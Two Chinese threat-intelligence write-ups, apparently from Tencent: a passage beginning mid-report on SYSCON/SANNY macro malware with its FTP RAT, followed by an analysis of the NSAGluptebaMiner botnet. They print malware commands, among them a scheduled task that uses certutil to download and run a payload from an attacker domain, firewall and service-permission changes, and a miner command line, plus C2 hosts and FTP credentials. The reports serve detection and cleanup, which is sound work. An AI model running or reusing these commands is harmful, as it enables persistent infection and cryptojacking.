最新的攻击宏代码主要恶意行为是释放一个PE文件，并创建进程执行，执行时会将配置的CC信息作为命令行参数传递给恶意进程。 释放PE文件相关宏代码之一 释放PE文件相关宏代码之二 四、downloader&install过程分析 释放出的PE文件是一个downloader木马，其主要功能是从命令行参数中提取URL，并进行一系列的下载、解压和安装行为，以下以最新版本的文件up.exe（a83ca91c55e7af71ac4f712610646fca）作为样本进行详细分析。 up.exe行为 1）首先从参数中取出URL，然后判断操作系统是32位还是64位，如果32位则下载2.dat、64位下载3.dat下载完成后将其解密成temp.cab，随后执行expand命令对cab进行解压释放 downloader主要功能函数 2）cab内容如下，主要包含一个安装bat文件、一个RAT dll文件、一个ini文件 cab压缩包内容 3）检查当前进程权限，不同权限不同处理方式 进程权限检测相关代码 4）如果不是TokenElevationTypeLimited权限，即管理员用于以非管理员权限运行程序，则直接winexec执行install.bat，如果是TokenElevationTypeLimited则判断cmd.exe的版本，根据版本不同执行不同的UAC bypass策略，共内置了三种绕过UAC的方式。 根据cmd版本信息使用不同的UAC bypass方案 5）UAC bypass方式一相关代码 UAC bypass方式一 6）UACbypass方式二相关代码 UAC bypass方式二 7）UAC bypass方式三相关代码 UAC bypass方式三 8）install.bat的功能就是将wprint.dll和wprint.ini复制到system32目录，并创建服务持久化dll install.bat 五、RAT行为详细分析 1，首先判断目录下是否有dll同名的dat文件，如果有则读取并解密出配置信息，如果没有则读取同名的ini文件，即wprint.ini并解密，解密得到URL后进行不断尝试下载dat 解密ini获取url下载dat相关代码 2、wprint.ini解密结果如下：是一个url，使用URLDownloadToFile进行下载后存为wprint.dat 解密后的ini内容 3）读取wprint.dat并解密，得到包括ftpserver、username、password在内的配置信息 从dat从提取配置信息相关代码 4）根据配置信息连接ftpserver，并将server上的htdocs设置为当前目录，在其中创建一个以本地computername加密后的字符串为名称的新目录 连接ftpserver、创建目录相关代码 5）先后执行cmd /c systeminfo > temp.ini、cmd /c tasklist > temp.ini两个命令收集计算机信息和进程列表，加密上传temp.ini文件到ftpserver并以ff mm-dd hh-mm-ss.txt的时间格式命名。 执行命令获取信息相关代码 6）ftp上传文件相关代码，除了.cab、.zip、.rar外的其他扩展名文件均会被压缩成.cab后加密上传 上传信息、文件相关代码 7）依次下载ftpserver上的cc(x)文件到本地解析指令进行命令分发，x为从0开始依次自增的整数 获取控制指令相关代码 获取控制指令相关代码 8）命令文件格式为开头“#”字符与第二个“#”之间的为下发的文件内容，第二个“#”之后的为指令内容 解析控制文件cc相关代码 9）控制指令列表如下：主要完成cmdshell和文件上传下载执行的功能 10）cmd /c指令相关处理代码如下 cmd命令相关代码 11）/user指令相关处理代码如下 user命令相关代码 12）其他指令处理代码如下 其他命令相关处理代码 六、版本变化 SYSCON/SANNY的活动最早可追溯到2017年，使用ftp协议作为RAT控制协议的木马是该组织最早使用也是最长使用的手法，与之前版本的木马相比，近期攻击所使用的木马有以下升级点： 七、安全建议 腾讯安全威胁情报中心建议我国政府机关、重要企业、科研单位对APT攻击保持高度警惕，可参考以下建议提升信息系统的安全性： 1、建议重要机构网管培训工作人员不要随意打开不明来源的邮件附件，在邮件目的及发件人均未知的情况下，建议不要访问附件。 2、建议企业用户使用腾讯T-Sec终端安全管理系统修补漏洞，及时安装系统补丁，可减少被漏洞攻击的风险。同时注意打开Office文档时，避免启用宏代码。 3、推荐企业用户部署腾讯T-Sec高级威胁检测系统（腾讯御界）对黑客攻击行为进行检测。 八、附录 IOCs HASH： guidance.doc： 677e200c602b44dc0a6cc5f685f78413 123.doc： 40e7a1f37950277b115d5944b53eaf3c Keep an eye on North Korean cyber.doc： 1a7232ef1386f78e76052827d8f703ae Kinzler Foundation for 2020 Tokyo Paralympic games.doc: faf6492129eeca2633a68c9b8c2b8156 ce26d4e20d936ebdad92f29f03dfc1d9 7e71d5a0f1899212cea498bbda476ce8 a83ca91c55e7af71ac4f712610646fca 77f46253fd4ce7176df5db8f71585368 62e959528ae9280f39d49ba5c559d8fb C2： phpview.mygamesonline.org firefox-plug.c1.biz win10-ms.c1.biz ftpserver:myview-202001.c1.biz username:3207035 password:1qazXSW@3edc 参考链接 https://mp.weixin.qq.com/s/rh4DoswLUNkS8uiHjrFU9A https://mp.weixin.qq.com/s/CBh2f-lfG5H4wcoj5VSfEw https://mp.weixin.qq.com/s/F2-DLtuHUkV_nCnKwp44_Q

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ   一、概述 腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据，并具有远程执行命令的功能，同时还会利用比特币交易数据更新C2。 cloudnet.exe原来是Glupteba恶意木马，Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现，2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。 当前NSAGluptebaMiner版本具有以下特征： 利用永恒之蓝漏洞攻击传播； 安装计划任务实现持久化，任务利用certutil.exe下载木马； 利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传； 绕过UAC，以管理员权限和系统权限运行，将木马程序加入防火墙策略白名单、Windows Defender查杀白名单； 安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护； 运行门罗币挖矿程序wup.exe； 利用组件cloudnet.exe构建僵尸网络； 连接远程服务器，接收指令完成远控操作； 通过比特币交易数据更新C2地址。 二、详细分析 漏洞攻击成功后，Payload首先下载app.exe在内存中执行PE文件，并且将该文件释放到C:\Windows\rss\csrss.exe，csrss.exe是一个木马下载器，采用Go编程语言编写。 下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户，以及一些以二进制形式硬编码的信息来初始化“配置信息”，然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>（8位随机字符）来存储所有获取的信息。（之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp） 首先会检测是否在虚拟机中执行。 然后判断是否是系统权限，如果不是则通过以TrustedInstaller运行自己提高权限。 在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件，并加载对应的驱动程序： Winmon.sys用于隐藏对应PID进程； WinmonFS.sys隐藏指定文件或目录； WinmonProcessMonitor.sys查找指定进程，并关闭。 维护以系统服务的方式启动的木马（检查服务、下载安装服务、更新服务、删除服务）。 下载永恒之蓝漏洞漏洞利用程序，利用漏洞攻击局域网机器。 下载矿机和挖矿代理配置信息。 获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash。 在handleCommand函数中实现后门功能，包括下载文件、程序执行等。 各函数及对应操作如下： 函数 操作 GetAppName 获取App名 IsAdmin 是否Admin账号 ProcessIsRunning 进程是否运行 Update 更新 Exec 执行程序 Download 下载 DownloadAndRun 下载并执行 DownloadAndRunExtended 下载并执行扩展 Exit 退出 UpdateData 更新数据 UpdateCloudnet 更新cloudnet.exe StopWUP 停止挖矿程序wup.exe UpdateService 更新服务 GetLogfileProxy 读取日志文件\proxy\t GetLogfileI2Pd 读取日志文件\i2pd\i2pd.log Notify 开启心跳包，在指定的时间间隔进行上报 NotifyHost 上报主机 EventExists 判断event是否存在 MutexExists 判断Mutuex是否存在 RegistryGetStartup 注册自启动项 VerifySignature 验证文件签名 RegistryGetStartupSignatures 验证启动项文件签名 VerifyProcessesSignatures 验证进程文件签名 GetUnverifiedFiles 上报未签名的文件 GetStatsWUP 获取挖矿木马统计信息 UploadFile 上传文件 Install 下载并安装 SC 截屏 UpdateCDN 更新C2 DiscoverElectrum 使用硬编码的以太币钱包，读取区块链交易数据 DiscoverBlockchaincom 从区块链交易数据中获取加密的新的C2地址 设置防火墙规则，将csrss.exe添加到白名单： `netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:\Windows\rss\csrss.exe” enable=yes` 写入windows defender规则，添Winmon、WinmonFS、WinmonProcessMonitor加到白名单： cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)   安装名为“ScheduledUpdate”的计划任务，任务内容为：每当用户登陆时，利用certutil.exe下载app.exe，保存为scheduled.exe并运行： `schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340” /TN ScheduledUpdate /F` 灵活更新C2： 通过公开的列表查询Electrum比特币钱包服务器，使用硬编码的hash值查询对应的区块链脚本hash记录，对返回的数据进行AES解密得到新的C2地址。 组件updateprofile.exe为密码提取器，也使用Go编写，并使用UPX壳保护。 运行后搜集包括Chrome，Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码，打包上传到远程服务器。 组件cloudnet.exe负责构建僵尸网络， 会读取注册表中存放的UUID进行校验，在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息，移动自身到“\cloudnet\”文件夹下，连接C2服务器，接收远控指令。 组件wup.exe负责挖矿门罗币，csrss.exe启动wup.exe时传递参数 `C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background` Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件，最后执行另一同名文件C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿，该文件由开源挖矿程序XMRig编译。   三、安全建议 企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。 也可检查以下各项，如有进行清除： 目录和文件： C:\Users\Administrator\AppData\LoCal\Temp\Csrss\smb\ C:\users\administrator\appdata\loCal\temp\Csrss\ C:\Windows\rss\Csrss.exe C:\Windows\windefender.exe C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\WinmonProCessMonitor.sys C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe 注册表： HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random> HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet HKEY_CURRENT_USER\Software\MiCrosoft\<random> HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost 计划任务： ScheduledUpdate IOCs Domain biggames.club biggames.online deepsound.live sndvoices.com 2makestorage.com infocarnames.ru URL http[:]//biggames.club/app/app.exe https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe md5 b1c081429c23e3ef0268fd33e2fe79f9 da75bc9d4d74a7ae4883bfa66aa8e99b 00201e5ad4e27ff63ea32fb9a9bb2c2e 6918fd63f9ec3126b25ce7f059b7726a fcf8643ff7ffe5e236aa957d108958c9 9b47b9f19455bf56138ddb81c93b6c0c 0dbecc91932301ccc685b9272c717d61 矿池： premiumprice.shop:50001 参考链接 https://www.freebuf.com/articles/system/172929.html https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/